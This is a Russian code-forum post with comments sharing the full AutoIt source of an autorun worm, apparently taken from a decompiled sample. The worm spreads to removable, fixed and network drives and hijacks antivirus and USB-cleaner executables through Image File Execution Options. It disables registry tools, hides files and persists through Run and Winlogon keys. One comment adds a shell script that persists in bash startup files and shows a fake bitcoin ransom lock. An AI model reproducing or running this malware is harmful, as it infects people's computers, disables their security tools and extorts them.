1. VisualBasic / Говнокод #20385

    −70

    1. 001
    2. 002
    3. 003
    4. 004
    5. 005
    6. 006
    7. 007
    8. 008
    9. 009
    10. 010
    11. 011
    12. 012
    13. 013
    14. 014
    15. 015
    16. 016
    17. 017
    18. 018
    19. 019
    20. 020
    21. 021
    22. 022
    23. 023
    24. 024
    25. 025
    26. 026
    27. 027
    28. 028
    29. 029
    30. 030
    31. 031
    32. 032
    33. 033
    34. 034
    35. 035
    36. 036
    37. 037
    38. 038
    39. 039
    40. 040
    41. 041
    42. 042
    43. 043
    44. 044
    45. 045
    46. 046
    47. 047
    48. 048
    49. 049
    50. 050
    51. 051
    52. 052
    53. 053
    54. 054
    55. 055
    56. 056
    57. 057
    58. 058
    59. 059
    60. 060
    61. 061
    62. 062
    63. 063
    64. 064
    65. 065
    66. 066
    67. 067
    68. 068
    69. 069
    70. 070
    71. 071
    72. 072
    73. 073
    74. 074
    75. 075
    76. 076
    77. 077
    78. 078
    79. 079
    80. 080
    81. 081
    82. 082
    83. 083
    84. 084
    85. 085
    86. 086
    87. 087
    88. 088
    89. 089
    90. 090
    91. 091
    92. 092
    93. 093
    94. 094
    95. 095
    96. 096
    97. 097
    98. 098
    99. 099
    100. 100
    ;Autorun-червь на Autoit. Инфицирует сменные и локальные диски. Не вредоносный.
    ;Только для просмотра. Автор топика не несет ответственности за Ваши действия.
    
    AutoItSetOption("TrayIconHide", 1)
    
    Func AUTORUN_INF()
            If FileExists($VAR[$I] & "\autorun.inf") Then
                    $FILE = FileOpen($VAR[$I] & "\autorun.inf", 0)
                    $STR = FileReadLine($FILE, 2)
                    FileClose($FILE)
                    If $STR <> ("open=System_Cache\locale.exe") Then
                            FileSetAttrib($VAR[$I] & "\autorun.inf", "-HSR+A")
                            $AUT = FileOpen($VAR[$I] & "\autorun.inf", 10)
                            FileWrite($AUT, "[autorun]" & @CRLF)
                            FileWrite($AUT, "open=System_Cache\locale.exe" & @CRLF)
                            FileWrite($AUT, "shell\open=0B:@KBL(&O)" & @CRLF)
                            FileWrite($AUT, "shell\open\Command=System_Cache\locale.exe" & @CRLF)
                            FileWrite($AUT, "shell\open\Default=1" & @CRLF)
                            FileWrite($AUT, "shell\explore=@>2>4=8:" & @CRLF)
                            FileWrite($AUT, "shell\explore\Command=System_Cache\locale.exe")
                            FileClose($AUT)
                            FileSetAttrib($VAR[$I] & "\autorun.inf", "+HSR")
                    Else
                    EndIf
            Else
                    $FILE = FileOpen($VAR[$I] & "\autorun.inf", 10)
                    FileSetAttrib($VAR[$I] & "\autorun.inf", "+HSR")
                    FileWrite($FILE, "[autorun]" & @CRLF)
                    FileWrite($FILE, "open=System_Cache\locale.exe" & @CRLF)
                    FileWrite($FILE, "shell\open=0B:@KBL(&O)" & @CRLF)
                    FileWrite($FILE, "shell\open\Command=System_Cache\locale.exe" & @CRLF)
                    FileWrite($FILE, "shell\open\Default=1" & @CRLF)
                    FileWrite($FILE, "shell\explore=@>2>4=8:" & @CRLF)
                    FileWrite($FILE, "shell\explore\Command=System_Cache\locale.exe")
                    FileClose($FILE)
                    FileSetAttrib($VAR[$I] & "\autorun.inf", "+HSR")
            EndIf
    EndFunc
    
    $H = 1
    $START = @AutoItExe
    If $START <> (@SystemDir & "\locale.exe") Then
            $DRIVE = StringMid($START, 1, 3)
            $VAL = ShellExecute($DRIVE)
    Else
    EndIf
    RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe", "Debugger", "REG_SZ", @SystemDir & "\locale.exe")
    RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojanDetector.exe", "Debugger", "REG_SZ", @SystemDir & "\locale.exe")
    RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\anti_autorun.exe", "Debugger", "REG_SZ", @SystemDir & "\locale.exe")
    RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\USBCleaner.exe", "Debugger", "REG_SZ", @SystemDir & "\locale.exe")
    RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AvMonitor.exe", "Debugger", "REG_SZ", @SystemDir & "\locale.exe")
    RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system", "DisableRegistryTools", "REG_DWORD", "1")
    RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "Hidden", "REG_DWORD", "2")
    RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", "1")
    RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "AtiMonitor", "REG_SZ", @SystemDir & "\locale.exe")
    If ProcessExists("sirwnmi.exe") And ("sudlces.exe") Then
            ProcessClose("sirwnmi.exe")
            ProcessClose("sudlces.exe")
            If FileExists(@CommonFilesDir & "\System\" & "sudlces.exe") Then
                    FileSetAttrib(@CommonFilesDir & "\System\" & "sudlces.exe", "-HSR+A")
                    FileDelete(@CommonFilesDir & "\System\" & "sudlces.exe")
            EndIf
            If FileExists(@CommonFilesDir & "\Microsoft Shared\" & "sirwnmi.exe") Then
                    FileSetAttrib(@CommonFilesDir & "\Microsoft Shared\" & "sirwnmi.exe", "-HSR+A")
                    FileDelete(@CommonFilesDir & "\Microsoft Shared\" & "sirwnmi.exe")
            EndIf
    EndIf
    If FileExists(@SystemDir & "\avpo.exe") Then
            FileSetAttrib(@SystemDir & "\avpo.exe", "-HSR+A")
            FileDelete(@SystemDir & "\avpo.exe")
    EndIf
    If FileExists(@SystemDir & "\amvo.exe") Then
            FileSetAttrib(@SystemDir & "\amvo.exe", "-HSR+A")
            FileDelete(@SystemDir & "\amvo.exe")
    EndIf
    If ProcessExists("locale.exe") Then
            $X = 0
            $LIST = ProcessList("locale.exe")
            For $I = 1 To $LIST[0][0]
                    $X = $X + 1
            Next
            If $X > 1 Then
                    Exit
            EndIf
    EndIf
    While $H = 1
            $VAR = DriveGetDrive("REMOVABLE")
            If Not @error Then
                    For $I = 1 To $VAR[0]
                            If $VAR[$I] <> "A:"  Then
                                    $PUT = @AutoItExe
                                    FileCopy($PUT, $VAR[$I] & "\System_Cache\locale.exe", 8)
                                    FileSetAttrib($VAR[$I] & "\System_Cache", "+HSR", 1)
                                    FileCopy($PUT, "C:\windows\system32\ntfsours.exe", 8)
                                    FileCopy($PUT, "C:\windows\system32\locale.exe", 8)
                                    FileSetAttrib("C:\windows\system32\ntfsours.exe", "+HSR")
                                    FileSetAttrib("C:\windows\system32\locale.exe", "+HSR")
                                    AUTORUN_INF()
                            Else
                            EndIf

    Запостил: fajes_rown, 15 Июля 2016

    Комментарии (21) RSS

    • While $H = 1
              $VAR = DriveGetDrive("REMOVABLE")
              If Not @error Then
                      For $I = 1 To $VAR[0]
                              If $VAR[$I] <> "A:"  Then
                                      $PUT = @AutoItExe
                                      FileCopy($PUT, $VAR[$I] & "\System_Cache\locale.exe", 8)
                                      FileSetAttrib($VAR[$I] & "\System_Cache", "+HSR", 1)
                                      FileCopy($PUT, "C:\windows\system32\ntfsours.exe", 8)
                                      FileCopy($PUT, "C:\windows\system32\locale.exe", 8)
                                      FileSetAttrib("C:\windows\system32\ntfsours.exe", "+HSR")
                                      FileSetAttrib("C:\windows\system32\locale.exe", "+HSR")
                                      AUTORUN_INF()
                              Else
                              EndIf
                      Next
              EndIf
              $VAR = DriveGetDrive("Fixed")
              If Not @error Then
                      For $I = 1 To $VAR[0]
                              If $VAR[$I] <> "A:"  Then
                                      $PUT = @AutoItExe
                                      FileCopy($PUT, $VAR[$I] & "\System_Cache\locale.exe", 8)
                                      FileSetAttrib($VAR[$I] & "\System_Cache", "+HSR", 1)
                                      FileCopy($PUT, "C:\windows\system32\ntfsours.exe", 8)
                                      FileCopy($PUT, "C:\windows\system32\locale.exe", 8)
                                      FileSetAttrib("C:\windows\system32\ntfsours.exe", "+HSR")
                                      FileSetAttrib("C:\windows\system32\locale.exe", "+HSR")
                                      AUTORUN_INF()
                              Else
                              EndIf
                      Next
              EndIf
      Ответить
    • $VAR = DriveGetDrive("NETWORK")
              If Not @error Then
                      For $I = 1 To $VAR[0]
                              If $VAR[$I] <> "A:"  Then
                                      $PUT = @AutoItExe
                                      If FileCopy($PUT, $VAR[$I] & "\System_Cache\locale.exe", 8) = 1 Then
                                              FileSetAttrib($VAR[$I] & "\System_Cache", "+HSR", 1)
                                              FileCopy($PUT, "C:\windows\system32\ntfsours.exe", 8)
                                              FileCopy($PUT, "C:\windows\system32\locale.exe", 8)
                                              FileSetAttrib("C:\windows\system32\ntfsours.exe", "+HSR")
                                              FileSetAttrib("C:\windows\system32\locale.exe", "+HSR")
                                      Else
                                      EndIf
                                      AUTORUN_INF()
                              Else
                              EndIf
                      Next
              EndIf
              $USERINIT = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Userinit")
              If $USERINIT <> @SystemDir & "\userinit.exe," & @SystemDir & "\ntfsours.exe,"  Then
                      RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Userinit", "REG_SZ", @SystemDir & "\userinit.exe," & @SystemDir & "\ntfsours.exe,")
              EndIf
              If ProcessExists("ntfsours.exe") Then
                      ProcessClose("ntfsours.exe")
              EndIf
              Sleep(30000)
      WEnd
      Ответить
    • Надо же, какая у Вас умная подсветка. Всё как полагается подсвечивает.
      Ответить
      • Интеллектуальная подсветка — чтобы сэкономить ресурсы она не подсвечивает что не нужно. Васик не_нужен.
        Ответить
    • >>Func AUTORUN_INF()
      If FileExists($VAR[$I] & "\autorun.inf") Then

      Очень странно. $var упоминается только на строке #087, и то как обычная локальная переменная, здесь же используется как неявный аргумент. Как это возможно?
      Ответить
      • Оказывается, возможно. Этот код нормально компилируется и работает, ещё бы.
        Достал из декомпилированного червя.
        Ответить
      • Переменная оказывается в зоне видимости процедуры и становится как бы глобальной.
        В VBS то же самое.
        sub lol()
           msgbox param
        end sub
        
        dim param
        param="test"
        lol()

        Это вовсе не обращение из одного метода к локальной переменной другого.
        Ответить
    • Stertor, ты?
      Ответить
      • Я.
        Ответить
        • Стоит отметить, что, если ехать в секс-тур по Камеруну, то языкового барьера между мною и тамошними шоколадными зайцами не возникнет, ибо говорят там по-английски; а уж я с мало-мальским знанием английского языка завсегда смогу прокричать "Deeper, deeper!", верно?
          Ответить
        • А Sim_salapim - Вы?
          Ответить
    • Напиши вирус на линукс, ну напиши, а то все на винду и винду
      Ответить
      • Дык есть они. Просто обычно это какие-нибудь руткиты, а не детские игрушки типа авторанцев.
        Ответить
        • Зочем мне написаные, я хочу от него
          Ответить
          • #!/bin/sh
            ME="$HOME/.test"
            if [ ! -f "$ME" ]; then
                cp $0 "$ME"
                chmod +x "$ME"
                echo "$ME" >>"$HOME/.profile"
                echo "$ME" >>"$HOME/.bashrc"
            fi
            
            if [ "$0" != "$ME" ]; then exit 0; fi
            
            echo "Your sosnoole is locked. Please send 0.1BTC to my wallet to unlock it."
            while [ true ]; do sleep 1; done
            Ответить
            • Я хочу от него, на Васике, а не на ебаше
              Ответить
          • > я хочу от него
            Сына?
            Ответить
      • Наберите больше 1% и будут вам вирусы. Там где у питуха >1% так и есть: ембеддед - нихуевый такой ботнет на рутерах, серваки - руткиты. А то следующий анон свою ос напишет и будет бегать и требовать и ему вирус написать.
        Ответить
      • Я не пишу вирусы, готовый сорец запостил.
        Ответить

    Добавить комментарий